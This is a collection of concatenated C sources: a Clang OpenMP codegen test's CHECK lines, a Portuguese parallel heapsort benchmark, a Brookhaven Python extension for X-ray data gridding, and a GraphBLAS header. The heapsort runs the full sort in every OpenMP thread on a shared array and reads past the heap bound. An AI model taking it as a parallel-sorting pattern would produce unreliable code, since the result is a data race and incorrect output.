// CHECK-NEXT: %[[OMP_DISPATCH_IV:.+]] = phi i32 [ 0, %[[OMP_DISPATCH_PREHEADER]] ], [ %[[OMP_DISPATCH_NEXT:.+]], %[[OMP_DISPATCH_INC:.+]] ]
// CHECK-NEXT: br label %[[OMP_DISPATCH_COND:.+]]
// CHECK-EMPTY:
// CHECK-NEXT: [[OMP_DISPATCH_COND]]:
// CHECK-NEXT: %[[OMP_DISPATCH_CMP:.+]] = icmp ult i32 %[[OMP_DISPATCH_IV]], %[[OMP_DISPATCH_TRIPCOUNT]]
// CHECK-NEXT: br i1 %[[OMP_DISPATCH_CMP]], label %[[OMP_DISPATCH_BODY:.+]], label %[[OMP_DISPATCH_EXIT:.+]]
// CHECK-EMPTY:
// CHECK-NEXT: [[OMP_DISPATCH_BODY]]:
// CHECK-NEXT: %[[TMP12:.+]] = mul i32 %[[OMP_DISPATCH_IV]], %[[OMP_DISPATCH_STRIDE]]
// CHECK-NEXT: %[[TMP13:.+]] = add i32 %[[TMP12]], %[[OMP_FIRSTCHUNK_LB]]
// CHECK-NEXT: br label %[[OMP_LOOP_PREHEADER9:.+]]
// CHECK-EMPTY:
// CHECK-NEXT: [[OMP_DISPATCH_INC]]:
// CHECK-NEXT: %[[OMP_DISPATCH_NEXT]] = add nuw i32 %[[OMP_DISPATCH_IV]], 1
// CHECK-NEXT: br label %[[OMP_DISPATCH_HEADER]]
// CHECK-EMPTY:
// CHECK-NEXT: [[OMP_DISPATCH_EXIT]]:
// CHECK-NEXT: call void @__kmpc_for_static_fini(%struct.ident_t* @1, i32 %[[OMP_GLOBAL_THREAD_NUM]])
// CHECK-NEXT: %[[OMP_GLOBAL_THREAD_NUM10:.+]] = call i32 @__kmpc_global_thread_num(%struct.ident_t* @1)
// CHECK-NEXT: call void @__kmpc_barrier(%struct.ident_t* @2, i32 %[[OMP_GLOBAL_THREAD_NUM10]])
// CHECK-NEXT: br label %[[OMP_DISPATCH_AFTER:.+]]
// CHECK-EMPTY:
// CHECK-NEXT: [[OMP_DISPATCH_AFTER]]:
// CHECK-NEXT: br label %[[OMP_LOOP_AFTER:.+]]
// CHECK-EMPTY:
// CHECK-NEXT: [[OMP_LOOP_PREHEADER9]]:
// CHECK-NEXT: %[[TMP14:.+]] = add i32 %[[TMP13]], %[[OMP_CHUNK_RANGE]]
// CHECK-NEXT: %[[OMP_CHUNK_IS_LAST:.+]] = icmp uge i32 %[[TMP14]], %[[DOTCOUNT]]
// CHECK-NEXT: %[[TMP15:.+]] = sub i32 %[[DOTCOUNT]], %[[TMP13]]
// CHECK-NEXT: %[[OMP_CHUNK_TRIPCOUNT:.+]] = select i1 %[[OMP_CHUNK_IS_LAST]], i32 %[[TMP15]], i32 %[[OMP_CHUNK_RANGE]]
// CHECK-NEXT: br label %[[OMP_LOOP_HEADER:.+]]
// CHECK-EMPTY:
// CHECK-NEXT: [[OMP_LOOP_HEADER]]:
// CHECK-NEXT: %[[OMP_LOOP_IV:.+]] = phi i32 [ 0, %[[OMP_LOOP_PREHEADER9]] ], [ %[[OMP_LOOP_NEXT:.+]], %[[OMP_LOOP_INC:.+]] ]
// CHECK-NEXT: br label %[[OMP_LOOP_COND:.+]]
// CHECK-EMPTY:
// CHECK-NEXT: [[OMP_LOOP_COND]]:
// CHECK-NEXT: %[[OMP_LOOP_CMP:.+]] = icmp ult i32 %[[OMP_LOOP_IV]], %[[OMP_CHUNK_TRIPCOUNT]]
// CHECK-NEXT: br i1 %[[OMP_LOOP_CMP]], label %[[OMP_LOOP_BODY:.+]], label %[[OMP_LOOP_EXIT:.+]]
// CHECK-EMPTY:
// CHECK-NEXT: [[OMP_LOOP_BODY]]:
// CHECK-NEXT: %[[TMP16:.+]] = add i32 %[[OMP_LOOP_IV]], %[[TMP13]]
// CHECK-NEXT: call void @__captured_stmt.1(i32* %[[I]], i32 %[[TMP16]], %struct.anon.0* %[[AGG_CAPTURED1]])
// CHECK-NEXT: %[[TMP17:.+]] = load float*, float** %[[B_ADDR]], align 8
// CHECK-NEXT: %[[TMP18:.+]] = load i32, i32* %[[I]], align 4
// CHECK-NEXT: %[[IDXPROM:.+]] = zext i32 %[[TMP18]] to i64
// CHECK-NEXT: %[[ARRAYIDX:.+]] = getelementptr inbounds float, float* %[[TMP17]], i64 %[[IDXPROM]]
// CHECK-NEXT: %[[TMP19:.+]] = load float, float* %[[ARRAYIDX]], align 4
// CHECK-NEXT: %[[TMP20:.+]] = load float*, float** %[[C_ADDR]], align 8
// CHECK-NEXT: %[[TMP21:.+]] = load i32, i32* %[[I]], align 4
// CHECK-NEXT: %[[IDXPROM2:.+]] = zext i32 %[[TMP21]] to i64
// CHECK-NEXT: %[[ARRAYIDX3:.+]] = getelementptr inbounds float, float* %[[TMP20]], i64 %[[IDXPROM2]]
// CHECK-NEXT: %[[TMP22:.+]] = load float, float* %[[ARRAYIDX3]], align 4
// CHECK-NEXT: %[[MUL:.+]] = fmul float %[[TMP19]], %[[TMP22]]
// CHECK-NEXT: %[[TMP23:.+]] = load float*, float** %[[D_ADDR]], align 8
// CHECK-NEXT: %[[TMP24:.+]] = load i32, i32* %[[I]], align 4
// CHECK-NEXT: %[[IDXPROM4:.+]] = zext i32 %[[TMP24]] to i64
// CHECK-NEXT: %[[ARRAYIDX5:.+]] = getelementptr inbounds float, float* %[[TMP23]], i64 %[[IDXPROM4]]
// CHECK-NEXT: %[[TMP25:.+]] = load float, float* %[[ARRAYIDX5]], align 4
// CHECK-NEXT: %[[MUL6:.+]] = fmul float %[[MUL]], %[[TMP25]]
// CHECK-NEXT: %[[TMP26:.+]] = load float*, float** %[[A_ADDR]], align 8
// CHECK-NEXT: %[[TMP27:.+]] = load i32, i32* %[[I]], align 4
// CHECK-NEXT: %[[IDXPROM7:.+]] = zext i32 %[[TMP27]] to i64
// CHECK-NEXT: %[[ARRAYIDX8:.+]] = getelementptr inbounds float, float* %[[TMP26]], i64 %[[IDXPROM7]]
// CHECK-NEXT: store float %[[MUL6]], float* %[[ARRAYIDX8]], align 4
// CHECK-NEXT: br label %[[OMP_LOOP_INC]]
// CHECK-EMPTY:
// CHECK-NEXT: [[OMP_LOOP_INC]]:
// CHECK-NEXT: %[[OMP_LOOP_NEXT]] = add nuw i32 %[[OMP_LOOP_IV]], 1
// CHECK-NEXT: br label %[[OMP_LOOP_HEADER]]
// CHECK-EMPTY:
// CHECK-NEXT: [[OMP_LOOP_EXIT]]:
// CHECK-NEXT: br label %[[OMP_DISPATCH_INC]]
// CHECK-EMPTY:
// CHECK-NEXT: [[OMP_LOOP_AFTER]]:
// CHECK-NEXT: ret void
// CHECK-NEXT: }
extern "C" void workshareloop_unsigned_static_chunked(float *a, float *b, float *c, float *d) {
#pragma omp for schedule(static, 5)
for (unsigned i = 33; i < 32000000; i += 7) {
a[i] = b[i] * c[i] * d[i];
}
}
#endif // HEADER
// CHECK-LABEL: define {{.*}}@__captured_stmt(
// CHECK-NEXT: [[ENTRY:.*]]:
// CHECK-NEXT: %[[DISTANCE_ADDR:.+]] = alloca i32*, align 8
// CHECK-NEXT: %[[__CONTEXT_ADDR:.+]] = alloca %struct.anon*, align 8
// CHECK-NEXT: %[[DOTSTART:.+]] = alloca i32, align 4
// CHECK-NEXT: %[[DOTSTOP:.+]] = alloca i32, align 4
// CHECK-NEXT: %[[DOTSTEP:.+]] = alloca i32, align 4
// CHECK-NEXT: store i32* %[[DISTANCE:.+]], i32** %[[DISTANCE_ADDR]], align 8
// CHECK-NEXT: store %struct.anon* %[[__CONTEXT:.+]], %struct.anon** %[[__CONTEXT_ADDR]], align 8
// CHECK-NEXT: %[[TMP0:.+]] = load %struct.anon*, %struct.anon** %[[__CONTEXT_ADDR]], align 8
// CHECK-NEXT: %[[TMP1:.+]] = getelementptr inbounds %struct.anon, %struct.anon* %[[TMP0]], i32 0, i32 0
// CHECK-NEXT: %[[TMP2:.+]] = load i32*, i32** %[[TMP1]], align 8
// CHECK-NEXT: %[[TMP3:.+]] = load i32, i32* %[[TMP2]], align 4
// CHECK-NEXT: store i32 %[[TMP3]], i32* %[[DOTSTART]], align 4
// CHECK-NEXT: store i32 32000000, i32* %[[DOTSTOP]], align 4
// CHECK-NEXT: store i32 7, i32* %[[DOTSTEP]], align 4
// CHECK-NEXT: %[[TMP4:.+]] = load i32, i32* %[[DOTSTART]], align 4
// CHECK-NEXT: %[[TMP5:.+]] = load i32, i32* %[[DOTSTOP]], align 4
// CHECK-NEXT: %[[CMP:.+]] = icmp ult i32 %[[TMP4]], %[[TMP5]]
// CHECK-NEXT: br i1 %[[CMP]], label %[[COND_TRUE:.+]], label %[[COND_FALSE:.+]]
// CHECK-EMPTY:
// CHECK-NEXT: [[COND_TRUE]]:
// CHECK-NEXT: %[[TMP6:.+]] = load i32, i32* %[[DOTSTOP]], align 4
// CHECK-NEXT: %[[TMP7:.+]] = load i32, i32* %[[DOTSTART]], align 4
// CHECK-NEXT: %[[SUB:.+]] = sub i32 %[[TMP6]], %[[TMP7]]
// CHECK-NEXT: %[[TMP8:.+]] = load i32, i32* %[[DOTSTEP]], align 4
// CHECK-NEXT: %[[SUB1:.+]] = sub i32 %[[TMP8]], 1
// CHECK-NEXT: %[[ADD:.+]] = add i32 %[[SUB]], %[[SUB1]]
// CHECK-NEXT: %[[TMP9:.+]] = load i32, i32* %[[DOTSTEP]], align 4
// CHECK-NEXT: %[[DIV:.+]] = udiv i32 %[[ADD]], %[[TMP9]]
// CHECK-NEXT: br label %[[COND_END:.+]]
// CHECK-EMPTY:
// CHECK-NEXT: [[COND_FALSE]]:
// CHECK-NEXT: br label %[[COND_END]]
// CHECK-EMPTY:
// CHECK-NEXT: [[COND_END]]:
// CHECK-NEXT: %[[COND:.+]] = phi i32 [ %[[DIV]], %[[COND_TRUE]] ], [ 0, %[[COND_FALSE]] ]
// CHECK-NEXT: %[[TMP10:.+]] = load i32*, i32** %[[DISTANCE_ADDR]], align 8
// CHECK-NEXT: store i32 %[[COND]], i32* %[[TMP10]], align 4
// CHECK-NEXT: ret void
// CHECK-NEXT: }
// CHECK-LABEL: define {{.*}}@__captured_stmt.1(
// CHECK-NEXT: [[ENTRY:.*]]:
// CHECK-NEXT: %[[LOOPVAR_ADDR:.+]] = alloca i32*, align 8
// CHECK-NEXT: %[[LOGICAL_ADDR:.+]] = alloca i32, align 4
// CHECK-NEXT: %[[__CONTEXT_ADDR:.+]] = alloca %struct.anon.0*, align 8
// CHECK-NEXT: store i32* %[[LOOPVAR:.+]], i32** %[[LOOPVAR_ADDR]], align 8
// CHECK-NEXT: store i32 %[[LOGICAL:.+]], i32* %[[LOGICAL_ADDR]], align 4
// CHECK-NEXT: store %struct.anon.0* %[[__CONTEXT:.+]], %struct.anon.0** %[[__CONTEXT_ADDR]], align 8
// CHECK-NEXT: %[[TMP0:.+]] = load %struct.anon.0*, %struct.anon.0** %[[__CONTEXT_ADDR]], align 8
// CHECK-NEXT: %[[TMP1:.+]] = getelementptr inbounds %struct.anon.0, %struct.anon.0* %[[TMP0]], i32 0, i32 0
// CHECK-NEXT: %[[TMP2:.+]] = load i32, i32* %[[TMP1]], align 4
// CHECK-NEXT: %[[TMP3:.+]] = load i32, i32* %[[LOGICAL_ADDR]], align 4
// CHECK-NEXT: %[[MUL:.+]] = mul i32 7, %[[TMP3]]
// CHECK-NEXT: %[[ADD:.+]] = add i32 %[[TMP2]], %[[MUL]]
// CHECK-NEXT: %[[TMP4:.+]] = load i32*, i32** %[[LOOPVAR_ADDR]], align 8
// CHECK-NEXT: store i32 %[[ADD]], i32* %[[TMP4]], align 4
// CHECK-NEXT: ret void
// CHECK-NEXT: }
// CHECK: ![[META0:[0-9]+]] = !{i32 1, !"wchar_size", i32 4}
// CHECK: ![[META1:[0-9]+]] = !{i32 7, !"openmp", i32 45}
// CHECK: ![[META2:[0-9]+]] =
|
paralelo.c | #include <stdio.h>
#include <stdlib.h>
#include <time.h>
#include <assert.h>
#include <omp.h>
#define NUM_THREADS 64
#define NUM_REP 100
void heap_sort(int *vet, int N);
void cria_heap(int *vetor, int i, int f);
int main()
{
int *vetor, menu, tamanho_vetor, sair = 0, aleatorio = 0;
double tempo_medio = 0.0;
while (sair == 0) {
printf("\n\n\n--------------------------------------\n");
printf("\n ORDENACAO USANDO HEAPSORT PARALELO");
printf("\n 1-GERAR NOVO VETOR");
printf("\n 2-SAIR");
printf("\n--------------------------------------\n");
scanf("%d",&menu);
switch(menu) {
case 1:
printf("\nINSIRA O TAMANHO DO VETOR:\n");
scanf("%d",&tamanho_vetor);
vetor = calloc(tamanho_vetor, sizeof(unsigned int));
srand(time(NULL));
for (int j = 0; j < NUM_REP; j++) {
// Gera o vetor a ser ordenado (Aleatorio ou Inverso)
if (aleatorio) {
for (int i = 0; i < tamanho_vetor; i++) {
vetor[i] = rand() % tamanho_vetor;
}
} else {
for (int i = tamanho_vetor-1; i >= 0; i--) {
vetor[i] = tamanho_vetor - i;
}
}
//Coleta o tempo inicial da execução do algoritmo
double tempo_inicial = omp_get_wtime();
//Realiza a chamada do algoritmo de ordenação paralelizado
heap_sort(vetor, tamanho_vetor);
//Coleta o tempo inicial da execução do algoritmo
double tempo_final = omp_get_wtime();
//Realiza o calculo do tempo total de execução do algoritmo em segundos
double tempo_total = tempo_final - tempo_inicial;
printf("Heapsorte paralelo executado em %g segundos\n", tempo_total);
//Realiza a soma do tempo de execução total do algoritmo
tempo_medio += tempo_total;
}
//Calcula o tempo médio de execução em relação ao número de repetições
tempo_medio /= NUM_REP;
printf("\nTamanho do Vetor = %d\n", tamanho_vetor);
printf("\nNumero de Threads = %d\n", NUM_THREADS);
printf("\nTempo medio = %g segundos\n", tempo_medio);
break;
case 2:
printf("\nPrograma Finalizado!");
sair=1;
break;
}
}
}
// Realiza o processo de ordenação de maneira paralelizada
void heap_sort(int *vet, int N)
{
#pragma omp parallel num_threads(NUM_THREADS) shared(vet, N)
{
int i, aux;
// Primeiro cria-se o vetor heap a partir dos dados, pegando
// o vetor do meio pra frente e tranformando-o em um heap
for ( i = (N -1)/2; i >= 0; i--) {
cria_heap(vet, i, N-1);
}
// Pega o maior maior elemento da heap, que se encontra no topo da arvore,
// e coloca na ultima posição do vetor em seguida reestrutura toda a heap,
// sem considerar a ultima posição do vetor e realiza todo o processo
// novamente até que o vetor esteja ordenado
for ( i = N-1; i >= 1; i--) {
aux = vet[0];
vet[0] = vet[i];
vet[i] = aux;
cria_heap(vet, 0, i-1);
}
}
}
// Transforma o vetor informado em um vetor heap
void cria_heap(int *vet, int i, int f)
{
int aux = vet[i];
int j = i * 2 + 1;
while (j <= f) {
if (vet[j] < vet[j+1]) {
j = j + 1;
}
if ( aux < vet[j] ) {
vet[i] = vet[j];
i = j;
j = 2 * i + 1;
} else {
j = f + 1;
}
}
vet[i] = aux;
}
|
ctrans.c | /*
* Copyright (c) 2014, Brookhaven Science Associates, Brookhaven
* National Laboratory. All rights reserved.
*
* Redistribution and use in source and binary forms, with or without
* modification, are permitted provided that the following conditions
* are met:
*
* * Redistributions of source code must retain the above copyright
* notice, this list of conditions and the following disclaimer.
*
* * Redistributions in binary form must reproduce the above copyright
* notice this list of conditions and the following disclaimer in
* the documentation and/or other materials provided with the
* distribution.
*
* * Neither the name of the Brookhaven Science Associates, Brookhaven
* National Laboratory nor the names of its contributors may be used
* to endorse or promote products derived from this software without
* specific prior written permission.
*
* THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS
* "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT
* LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS
* FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE
* COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT,
* INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES
* (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR
* SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION)
* HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT,
* STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OTHERWISE) ARISING
* IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE
* POSSIBILITY OF SUCH DAMAGE.
*
* This is ctranc.c routine. process_to_q and process_grid
* functions in the nsls2/recip.py call ctranc.c routine for
* fast data analysis.
*/
#ifdef _OPENMP
#include <omp.h>
#else
#define omp_get_thread_num() 0
#define omp_get_max_threads() 0
#define omp_get_num_threads() 1
#endif
#include <stdlib.h>
#include <math.h>
/* Include python and numpy header files */
#include <Python.h>
#define NPY_NO_DEPRECATED_API NPY_1_9_API_VERSION
#include <numpy/arrayobject.h>
#include "ctrans.h"
/* Computation functions */
static PyObject* ccdToQ(PyObject *self, PyObject *args, PyObject *kwargs){
PyArrayObject *angles = NULL;
PyObject *_angles = NULL;
PyArrayObject *ubinv = NULL;
PyObject *_ubinv = NULL;
PyArrayObject *qOut = NULL;
CCD ccd;
npy_intp dims[2];
npy_intp nimages;
int retval;
int mode;
double lambda;
double *anglesp = NULL;
double *qOutp = NULL;
double *ubinvp = NULL;
double *delgam = NULL;
static char *kwlist[] = { "angles", "mode", "ccd_size", "ccd_pixsize",
"ccd_cen", "dist", "wavelength",
"UBinv", NULL };
if(!PyArg_ParseTupleAndKeywords(args, kwargs, "Oi(ii)(dd)(dd)ddO", kwlist,
&_angles,
&mode,
&ccd.xSize, &ccd.ySize,
&ccd.xPixSize, &ccd.yPixSize,
&ccd.xCen, &ccd.yCen,
&ccd.dist,
&lambda,
&_ubinv)){
return NULL;
}
ccd.size = ccd.xSize * ccd.ySize;
angles = (PyArrayObject*)PyArray_FROMANY(_angles, NPY_DOUBLE, 2, 2, NPY_ARRAY_IN_ARRAY);
if(!angles){
goto cleanup;
}
ubinv = (PyArrayObject*)PyArray_FROMANY(_ubinv, NPY_DOUBLE, 2, 2, NPY_ARRAY_IN_ARRAY);
if(!ubinv){
goto cleanup;
}
ubinvp = (double *)PyArray_DATA(ubinv);
nimages = PyArray_DIM(angles, 0);
dims[0] = nimages * ccd.size;
dims[1] = 3;
qOut = (PyArrayObject*)PyArray_SimpleNew(2, dims, NPY_DOUBLE);
if(!qOut){
goto cleanup;
}
anglesp = (double *)PyArray_DATA(angles);
qOutp = (double *)PyArray_DATA(qOut);
// Now create the arrays for delta-gamma pairs
delgam = (double*)malloc(nimages * ccd.size * sizeof(double) * 2);
if(!delgam){
goto cleanup;
}
// Ok now we don't touch Python Object ... Release the GIL
Py_BEGIN_ALLOW_THREADS
retval = processImages(delgam, anglesp, qOutp, lambda, mode, (unsigned long)nimages,
ubinvp, &ccd);
// Now we have finished with the magic ... Obtain the GIL
Py_END_ALLOW_THREADS
if(retval){
PyErr_SetString(PyExc_RuntimeError, "Error processing images");
goto cleanup;
}
Py_XDECREF(ubinv);
Py_XDECREF(angles);
if(delgam) free(delgam);
return Py_BuildValue("N", qOut);
cleanup:
Py_XDECREF(ubinv);
Py_XDECREF(angles);
Py_XDECREF(qOut);
if(delgam) free(delgam);
return NULL;
}
int processImages(double *delgam, double *anglesp, double *qOutp, double lambda,
int mode, unsigned long nimages, double *ubinvp, CCD *ccd){
int retval = 0;
unsigned long i;
double UBI[3][3];
// Permute the UB matrix into the orientation
// for the calculations
for(i=0;i<3;i++){
UBI[i][0] = -1.0 * ubinvp[2];
UBI[i][1] = ubinvp[1];
UBI[i][2] = ubinvp[0];
ubinvp+=3;
}
#pragma omp parallel for shared(anglesp, qOutp, delgam, mode)
for(i=0;i<nimages;i++){
// Calculate pointer offsets
double *_anglesp = anglesp + (i * 6);
double *_qOutp = qOutp + (i * ccd->size * 3);
double *_delgam = delgam + (i * ccd->size * 2);
// For each image process
calcDeltaGamma(_delgam, ccd, _anglesp[0], _anglesp[5]);
calcQTheta(_delgam, _anglesp[1], _anglesp[4], _qOutp,
ccd->size, lambda);
if(mode > 1){
calcQPhiFromQTheta(_qOutp, ccd->size, _anglesp[2], _anglesp[3]);
}
if(mode == 4){
calcHKLFromQPhi(_qOutp, ccd->size, UBI);
}
}
return retval;
}
int calcDeltaGamma(double *delgam, CCD *ccd, double delCen, double gamCen){
// Calculate Delta Gamma Values for CCD
int i,j;
double *delgamp = delgam;
double xPix, yPix;
xPix = ccd->xPixSize / ccd->dist;
yPix = ccd->yPixSize / ccd->dist;
for(j=0;j<ccd->ySize;j++){
for(i=0;i<ccd->xSize;i++){
*(delgamp++) = delCen - atan( ((double)j - ccd->yCen) * yPix);
*(delgamp++) = gamCen - atan( ((double)i - ccd->xCen) * xPix);
}
}
return true;
}
int calcQTheta(double* diffAngles, double theta, double mu, double *qTheta, int n, double lambda){
// Calculate Q in the Theta frame
// angles -> Six cicle detector angles [delta gamma]
// theta -> Theta value at this detector setting
// mu -> Mu value at this detector setting
// qTheta -> Q Values
// n -> Number of values to convert
int i;
double *angles;
double *qt;
double kl;
double del, gam;
angles = diffAngles;
qt = qTheta;
kl = 2 * M_PI / lambda;
for(i=0;i<n;i++){
del = *(angles++);
gam = *(angles++);
*qt = (-1.0 * sin(gam) * kl) - (sin(mu) * kl);
qt++;
*qt = (cos(del - theta) * cos(gam) * kl) - (cos(theta) * cos(mu) * kl);
qt++;
*qt = (sin(del - theta) * cos(gam) * kl) + (sin(theta) * cos(mu) * kl);
qt++;
}
return true;
}
int calcQPhiFromQTheta(double *qTheta, int n, double chi, double phi){
double r[3][3];
r[0][0] = cos(chi);
r[0][1] = 0.0;
r[0][2] = -1.0 * sin(chi);
r[1][0] = sin(phi) * sin(chi);
r[1][1] = cos(phi);
r[1][2] = sin(phi) * cos(chi);
r[2][0] = cos(phi) * sin(chi);
r[2][1] = -1.0 * sin(phi);
r[2][2] = cos(phi) * cos(chi);
matmulti(qTheta, n, r);
return true;
}
int calcHKLFromQPhi(double *qPhi, int n, double mat[][3]){
matmulti(qPhi, n, mat);
return true;
}
int matmulti(double *val, int n, double mat[][3]){
double *v;
double qp[3];
int i,j,k;
v = val;
for(i=0;i<n;i++){
for(k=0;k<3;k++){
qp[k] = 0.0;
for(j=0;j<3;j++){
qp[k] += mat[k][j] * v[j];
}
}
for(k=0;k<3;k++){
v[k] = qp[k];
}
v += 3;
}
return true;
}
static PyObject* gridder_3D(PyObject *self, PyObject *args, PyObject *kwargs){
PyArrayObject *gridout = NULL, *Nout = NULL, *stderror = NULL;
PyArrayObject *gridI = NULL;
PyObject *_I;
npy_intp data_size;
npy_intp dims[3];
double grid_start[3];
double grid_stop[3];
unsigned long grid_nsteps[3];
int ignore_nan = 0;
int retval;
static char *kwlist[] = { "data", "xrange", "yrange", "zrange", "ignore_nan", NULL };
if(!PyArg_ParseTupleAndKeywords(args, kwargs, "O(ddd)(ddd)(lll)|d", kwlist,
&_I,
&grid_start[0], &grid_start[1], &grid_start[2],
&grid_stop[0], &grid_stop[1], &grid_stop[2],
&grid_nsteps[0], &grid_nsteps[1], &grid_nsteps[2],
&ignore_nan)){
return NULL;
}
gridI = (PyArrayObject*)PyArray_FROMANY(_I, NPY_DOUBLE, 0, 0, NPY_ARRAY_IN_ARRAY);
if(!gridI){
goto error;
}
data_size = PyArray_DIM(gridI, 0);
if(PyArray_DIM(gridI, 1) != 4){
PyErr_SetString(PyExc_ValueError, "Dimension 1 of array must be 4");
goto error;
}
dims[0] = grid_nsteps[0];
dims[1] = grid_nsteps[1];
dims[2] = grid_nsteps[2];
gridout = (PyArrayObject*)PyArray_SimpleNew(3, dims, NPY_DOUBLE);
if(!gridout){
goto error;
}
Nout = (PyArrayObject*)PyArray_SimpleNew(3, dims, NPY_ULONG);
if(!Nout){
goto error;
}
stderror = (PyArrayObject*)PyArray_SimpleNew(3, dims, NPY_DOUBLE);
if(!stderror){
goto error;
}
// Ok now we don't touch Python Object ... Release the GIL
Py_BEGIN_ALLOW_THREADS
retval = c_grid3d((double*)PyArray_DATA(gridout), (unsigned long*)PyArray_DATA(Nout),
(double*)PyArray_DATA(stderror), (double*)PyArray_DATA(gridI),
grid_start, grid_stop, (unsigned long)data_size, grid_nsteps,
ignore_nan);
// Ok now get the GIL back
Py_END_ALLOW_THREADS
if(retval){
// We had a runtime error
PyErr_SetString(PyExc_MemoryError, "Could not allocate memory in c_grid3d");
goto error;
}
Py_XDECREF(gridI);
return Py_BuildValue("NNN", gridout, Nout, stderror);
error:
Py_XDECREF(gridI);
Py_XDECREF(gridout);
Py_XDECREF(Nout);
Py_XDECREF(stderror);
return NULL;
}
int c_grid3d(double *dout, unsigned long *nout, double *stderror, double *data,
double *grid_start, double *grid_stop, unsigned long max_data,
unsigned long *n_grid, int ignore_nan){
unsigned long i, j;
int n;
int retval = 0;
unsigned long grid_size = 0;
double grid_len[3];
// Some useful quantities
grid_size = n_grid[0] * n_grid[1] * n_grid[2];
for(i=0;i<3; i++){
grid_len[i] = grid_stop[i] - grid_start[i];
}
int max_threads = omp_get_max_threads();
int num_threads;
gridderThreadData *threadData = malloc(sizeof(gridderThreadData) * max_threads);
if(!threadData){
return 1;
}
for(n=0;n<max_threads;n++){
threadData[n].nout = NULL;
threadData[n].dout = NULL;
threadData[n].d2out = NULL;
}
#pragma omp parallel shared(data, num_threads, threadData, grid_start, grid_len)
{
int thread_num = omp_get_thread_num();
num_threads = omp_get_num_threads();
double *_d2out;
double *_dout;
unsigned long *_nout;
_d2out = (double*)malloc(sizeof(double) * grid_size);
_dout = (double *)malloc(sizeof(double) * grid_size);
_nout = (unsigned long *)malloc(sizeof(unsigned long) * grid_size);
if((_d2out != NULL) && (_dout != NULL) && (_nout != NULL)){
// Clear the arrays ....
for(j=0;j<grid_size;j++){
_dout[j] = 0.0;
_d2out[j] = 0.0;
_nout[j] = 0;
}
#pragma omp for
for(i=0;i<max_data;i++){
double pos_double[3];
unsigned long grid_pos[3];
double *data_ptr = data + (i * 4);
// Check if we have a NaN
if((ignore_nan == 1) || !isnan(data_ptr[3])){
// Calculate the relative position in the grid.
pos_double[0] = (data_ptr[0] - grid_start[0]) / grid_len[0];
pos_double[1] = (data_ptr[1] - grid_start[1]) / grid_len[1];
pos_double[2] = (data_ptr[2] - grid_start[2]) / grid_len[2];
if((pos_double[0] >= 0) && (pos_double[0] < 1) &&
(pos_double[1] >= 0) && (pos_double[1] < 1) &&
(pos_double[2] >= 0) && (pos_double[2] < 1)){
// Calculate the position in the grid
grid_pos[0] = (int)(pos_double[0] * n_grid[0]);
grid_pos[1] = (int)(pos_double[1] * n_grid[1]);
grid_pos[2] = (int)(pos_double[2] * n_grid[2]);
unsigned long pos = grid_pos[0] * (n_grid[1] * n_grid[2]);
pos += grid_pos[1] * n_grid[2];
pos += grid_pos[2];
// Store the answer
_dout[pos] += data_ptr[3];
_d2out[pos] += (data_ptr[3] * data_ptr[3]);
_nout[pos]++;
}
}
}
threadData[thread_num].dout = _dout;
threadData[thread_num].d2out = _d2out;
threadData[thread_num].nout = _nout;
} else {
retval = 1;
}
} // pragma parallel
if(retval){
goto error;
}
// Now gather the results
for(n=1;n<num_threads;n++){
for(j=0;j<grid_size;j++){
threadData[0].nout[j] += threadData[n].nout[j];
threadData[0].dout[j] += threadData[n].dout[j];
threadData[0].d2out[j] += threadData[n].d2out[j];
}
}
// Calculate the stderror
for(j=0;j<grid_size;j++){
if(threadData[0].nout[j] == 0){
stderror[j] = 0.0;
} else {
double var = (threadData[0].d2out[j] -
pow(threadData[0].dout[j], 2) / threadData[0].nout[j]) /
threadData[0].nout[j];
stderror[j] = pow(var, 0.5) / pow(threadData[0].nout[j], 0.5);
}
}
// Now copy the outputs to the arrays
for(j=0;j<grid_size;j++){
dout[j] = threadData[0].dout[j];
nout[j] = threadData[0].nout[j];
}
// Now free the memory.
error:
for(n=0;n<max_threads;n++){
if(threadData[n].d2out) free(threadData[n].d2out);
if(threadData[n].dout) free(threadData[n].dout);
if(threadData[n].nout) free(threadData[n].nout);
}
free(threadData);
return retval;
}
static PyMethodDef ctrans_methods[] = {
{"grid3d", (PyCFunction)gridder_3D, METH_VARARGS | METH_KEYWORDS,
"Grid the numpy.array object into a regular grid"},
{"ccdToQ", (PyCFunction)ccdToQ, METH_VARARGS | METH_KEYWORDS,
"Convert CCD image coordinates into Q values"},
{NULL, NULL}
};
#if PY_MAJOR_VERSION >= 3
static struct PyModuleDef moduledef = {
PyModuleDef_HEAD_INIT,
"ctrans",
"Python functions to perform gridding (binning) of experimental data.\n\n",
-1, // we keep state in global vars
ctrans_methods,
};
PyObject* PyInit_ctrans(void) {
PyObject *module = PyModule_Create(&moduledef);
if(!module){
return NULL;
}
import_array();
return module;
}
#else // We have Python 2 ...
PyMODINIT_FUNC initctrans(void){
PyObject *module = Py_InitModule3("ctrans", ctrans_methods, _ctransDoc);
if(!module){
return;
}
import_array();
}
#endif
|
GB_binop__atan2_fp64.c | //------------------------------------------------------------------------------
// GB_binop: hard-coded functions for each built-in binary operator
//------------------------------------------------------------------------------
// SuiteSparse:GraphBLAS, Timothy A. Davis, (c) 2017-2021, All Rights Reserved.
// SPDX-License-Identifier: Apache-2.0
//------------------------------------------------------------------------------
// If this file is in the Generated/ folder, do not edit it (auto-generated).
#include "GB.h"
#ifndef GBCOMPACT
#include "GB_control.h"
#include "GB_ek_slice.h"
#include "GB_dense.h"
#include "GB_atomics.h"
#include "GB_bitmap_assign_methods.h"
#include "GB_binop__include.h"
// C=binop(A,B) is defined by the following types and operators:
// A+B function (eWiseAdd): GB_AaddB__atan2_fp64
// A.*B function (eWiseMult): GB_AemultB__atan2_fp64
// A*D function (colscale): (none)
